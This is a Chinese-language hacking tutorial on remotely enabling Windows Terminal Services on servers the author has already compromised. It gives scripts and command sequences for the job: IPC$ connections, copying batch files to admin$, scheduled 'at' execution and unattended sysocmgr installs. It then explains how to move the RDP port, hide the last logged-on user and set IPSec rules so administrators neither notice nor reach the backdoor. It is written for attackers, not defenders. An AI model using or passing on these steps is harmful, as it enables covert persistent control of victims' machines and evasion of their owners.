終端服務全攻略

終端服務全攻略

在漏洞不段出現的今天，入侵一臺服務器已經不是什麼新鮮事，但凡是入侵成功之後，都想盡辦法來打開終端服務，什麼是終端呢？又怎麼在遠程打開呢？看完本文，你就會成爲一個開“終端的高手”。

什麼是終端服務

3389又稱Terminal Service，服務終端。在WindowsNT中最先開始使用的一種終端，在Win2K的Professional版本中不可以安裝，在Server或以上版本纔可以安裝這個服務，其服務端口爲3389。由於使用簡單，方便等特點，一直受系統管理員的青昧。也正式因爲他的簡便，不產生交互式登陸，可以在後臺操作，因此也受到了黑客朋友的喜愛，事實可以說明，現在大多數朋友在入侵之後，都想打開windows終端服務，甚至不惜重啓對方的計算機，也要把終端服務安裝上，由此可見他的普遍性。另，在在XP系統中又叫做“遠程桌面”。

打開終端服務的各種方法
下面進入正題，開始今天的“終端”之旅。（各種工具我會提供）
一， 使用ROTS.VBS腳本

插撥廣告：

1， 什麼是VBS
VBScript的全稱是:Microsoft Visual Basic Script Editon.(微軟公司可視化BASIC腳本版). 正如其字面所透露的信息, VBS(VBScript的進一步簡寫)是基於Visual Basic的腳本語言. 我進一步解釋一下, Microsoft Visual Basic是微軟公司出品的一套可視化編程工具, 語法基於Basic. 腳本語言, 就是不編譯成二進制文件, 直接由宿主(host)解釋源代碼並執行, 簡單點說就是你寫的程序不需要編譯成.exe, 而是直接給用戶發送.vbs的源程序, 用戶就能執行了。

知道什麼是VBS了，下面開始進行測試。首先你要獲得這臺主機的Administrator權限或Local System權限，具體怎麼獲得在這不必討論。先來看看ROTS.VBS幫助.。(見圖1)

ROTS v1.01
Remote Open Terminal services Script, by zzzEVAzzz
Welcome to visite www.isgrey.com

Usage:
cscript c:/scriptpath/ROTS.vbs targetIP username password [port] [/r]
port: default number is 3389.
/r: auto reboot target.

一般的命令格式：ROTS.vbs <目標IP> <用戶名> <密碼> [服務端口] [自動重起選項]。

下面打開本地CMD，輸入：ROTS.vbs XXX.XXX.XX.XXX dahubaobao dahu 3389 /fr

注意：

1，/fr爲強制重啓，/r爲普通重啓，不要搞混了。
2， 腳本會判斷目標系統類型,如果不是server及以上版本,就會提示你是否要取消。

優點：成功率高。
缺點：必須重新啓動。
二，使用批處理（bat）
open3389.bat，先來看看幫助：
*******************Open3389*********************
使用方法：
open3389.bat ip user password
open3389.bat 目標ip 用戶名 密碼
還是打開CMD，輸入：open3389.bat XXX.XXX.XX.XXX dahubaobao dahu

好了 就這樣來打開3389，bat文件真的很好用，建議大家去學習。

優點：不必重新啓動。
缺點：成功率不高。

三， 使用HBULOT
這個工具要上傳到對方的機器，然後執行，比較麻煩。
C:/>net use //XXX.XXX.XX.XXX/IPC$ "dahu" /user:"dahubaobao" //建立IPC連接
C:/>copy HBULOT.exe // XXX.XXX.XX.XXX /WINNT/admin$ //上傳到對方的systeme32目錄下。
C:/>net use //XXX.XXX.XX.XXX/IPC$ /del //斷開IPC

然後telent過去，到對方的WINNT/systeme32目錄下，直接運行HBULOT.exe即可（見圖
3）。
————

下面介紹的不需要工具，具體請看我的方法
首先telent過去，然後輸入query user，使用這個命令的前提是安裝終端，如果出現如圖4
的情況，就表明安裝了終端。如果沒有，那就證明沒有安裝，請看我是怎麼做的：

C:/> dir c:/sysoc.inf /s //查找sysoc.inf文件的位置
c:/WINNT/inf 的目錄

2003-06-19 12:05 3,458 sysoc.inf
1 個文件 3,458 字節

C:/>dir c:/sysocmgr.* /s //查找組件安裝程序
c:/WINNT/system32 的目錄

1900-10-29 04:00 42,768 sysocmgr.exe
1 個文件 42,768 字節

C:/>echo [Components] > c:/ts
C:/>echo TSEnable = on >> c:/ts
//建立無人職守安裝的參數
C:/>sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/ts /q
開啓3389，並且重新啓動，如果
C:/>sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/ts /q /r
開啓3389，不重新啓動。

如果重新啓動，那等幾分鐘就可以用客戶端連接了，如果沒重新啓動，那就要等對方重新啓動之後，才能連接（看你的耐心嘍）。
————

在介紹一種很方便的做法，就是做一個bat文件，在本地運行即可，下面是bat的內容
echo [Components] > c:/ts

echo TSEnable = on >> c:/ts

C:/sqlsysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/ts /q

net use //ip/ipc$ dahu /user:dahubaobao

copy 路徑:/xxx.bat //ip/winnt/admin$

at time 00:00:00 xxx.bat

主機執行之後，會自動重啓，之後就可以利用3389登陸了。

這個bat文件很容易，前兩條語句是“建立無人職守安裝的參數”，第三條是真正的“開啓終端的命令”，第四條是“IPC連接”，第五是“把bat文件copy到對方的winnt/system32目錄下”，最後是用“time獲取時間，然後用at命令啓動。”

（個人推薦這種方法，比較簡單，有點IPC知識的就可以實現。）

修改終端服務端口

這一步很重要，我們辛苦的開啓了終端服務，不能因爲“3389”的暴露而前功盡棄，所以端口是必須修改的，先說一下原理，終端服務安裝完成後，會在註冊表中增加兩個鍵，其鍵值分別爲16進制的3389，即“0x00000D3D”。現在打開“運行”，輸入“regedit”啓動註冊表編輯器，然後打開HKEY-LOCAL_MACHINE/System/CurrentControlSet/Control/TerminalServer/Wds/Repwd/Tds/Tcp和HKEY-LOCAL_MACHINE/System/CurrentControlSet/Control/TerminalServer/WinStartions/RDP-TCP子鍵，修改“PortNumber”，假如我們修改成8080端口，其鍵值爲“1F90”，保存退出，注意，重啓之後才能生效，修改完成之後，會到本地，打開客戶端，輸入：XXX.XXX.XXX.XX:8080，就可以連接了。（見圖5，6）

有的朋友對註冊表不熟悉，更有甚者恐懼註冊表，認爲是很難駕御的地方，那好辦，下面介紹一個小工具，可以在命令行下修改端口，看我是怎麼做的：還是先來看幫助
=======================================================
Change Local or Remote TermService Port Program
Code By [email protected] Http://www.Haowawa.Com
=======================================================
Local Usage: c3389 7358
Remote Usage: c3389 //192.168.0.1 adminname password 7358

Local Host TermService Port is : 3389

本地修改：c3389 端口
遠程修改：c3389 //XXX.XXX.XXX.XX Admin用戶 密碼 端口

先來看本地修改：
打開CMD。輸入c3389 post，具體見圖7。

在來看遠程修改：
輸入c3389 //XXX.XXX.XXX.XX adminname password post。

到這裏，端口就修改關閉了。

隱藏上次登陸過的用戶名
在終端安裝完成後，並且你已經登陸過，那麼再次登陸就會顯示上次登陸過的用戶名，如果我們添加的帳戶（或克隆）被管理員看到了，那不起疑心纔怪呢？所以我們要隱藏登陸過的用戶，要實現隱藏，還是要修改註冊表，具體看我怎麼做：在“運行”中輸入“regedit”啓動註冊表編輯器，依次展開：HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon子鍵下的DontDisplayLastUserName，默認鍵值爲“0”，我們修改爲“1”，保存，退出，重新啓動之後生效。見圖8

限制/指定連接終端的地址
現在我們已經給肉雞看了終端，並且修改了端口，還做了一些簡單的維護，但這還是不夠的，假如某人知道了我們修改過的端口就是終端服務，那就掛了，所以還要在肉雞上通過IPSEC這個系統自帶的而且功能非常強大的工具來做一下限制，具體請看我的演示：

1，靜態IP
假如我的IP是111.222.255.255，我們通過設置IPSEC，來讓肉雞上的終端只通過我的連接，而拒絕除了我以外的所有連接，好，就這麼辦，先登陸終端，然後打開“管理工具”—“本地安全設置”，設置如下：

首先右鍵點擊“IP安全策略 在本地機器”選擇“創建IP策略”，然後打開了一個嚮導，即“IP安全策略嚮導”—“下一步”—“名稱”—“下一步”取消“激活默認響應規則”—“下一步”—“完成”，這是會重新打開一個“新IP安全策略 屬性”（見圖9），取消“使用“添加嚮導””—“添加”—出現“新規則屬性”—“添加”—出現“IP篩選器列表”—取消“使用“添加嚮導””—“添加”—出現“篩選器 屬性”，選擇“尋址”標籤，源地址設爲‘任何IP地址’，目的地址設爲‘我的IP地址’；在選擇“協議”標籤，選擇協議類型設爲‘TCP’，設置IP協議端口‘從任意端口’—‘到此端口8080’—“確定”（見圖10，11）--“關閉”—回到“新規則 屬性”—選擇“新IP篩選器列表”—在選“篩選器操作”標籤—取消“使用“添加嚮導””—“添加”—在“安全措施”標籤下選擇“阻止”—“確定”—“關閉”（見圖12），回到“新規則 屬性”—選中“新篩選器操作”—“關閉”—“關閉”—回到“本地安全設置”—選中“新IP安全策略”—右鍵點擊“指派”（見圖13），好了，總算設置完了，這樣所有的機器就無法連接8080（終端）端口了。

注意：以上都是使用默認的名稱，所以大家在設置的時候注意一下。

由於上邊的設置，把我自己也擋在了外面，這可不是我所想要的，所以，我們還要建立一條規則，允許我的IP 111.222.255.255訪問對方的8080端口，方法如下：

右鍵點擊“新IP安全策略”—“屬性”—不選“使用“添加嚮導””—出現“新規則 屬性”—“添加”—出現“IP篩選器列表”—不選“使用“添加嚮導””—“添加”—出現“篩選器 屬性”—選擇“尋址”標籤，設置成如圖14的樣子，在選擇“協議”標籤，設置成如圖12的樣子，然後“確定”—“關閉”—回到“新規則 屬性”—選中“新IP篩選器列表（1）”—在選“篩選器操作”標籤—在選“允許”—“關閉”—“關閉”—回到“本地安全設置”。
（見圖15）

2，動態IP

在中國，擁有靜態IP的人畢竟是少數，大多數朋友還都是撥號，雖然現在ADSL很普遍，但ADSL還是虛擬撥號，即動態IP，所以用上邊的方法設置IPSEC肯定是不行的，所以，現在我們要修改上邊的一條規則，使IPSEC可以通過 特定子網的連接，方法很簡單，其他的都不用改，按照圖16的方法設置就可以了。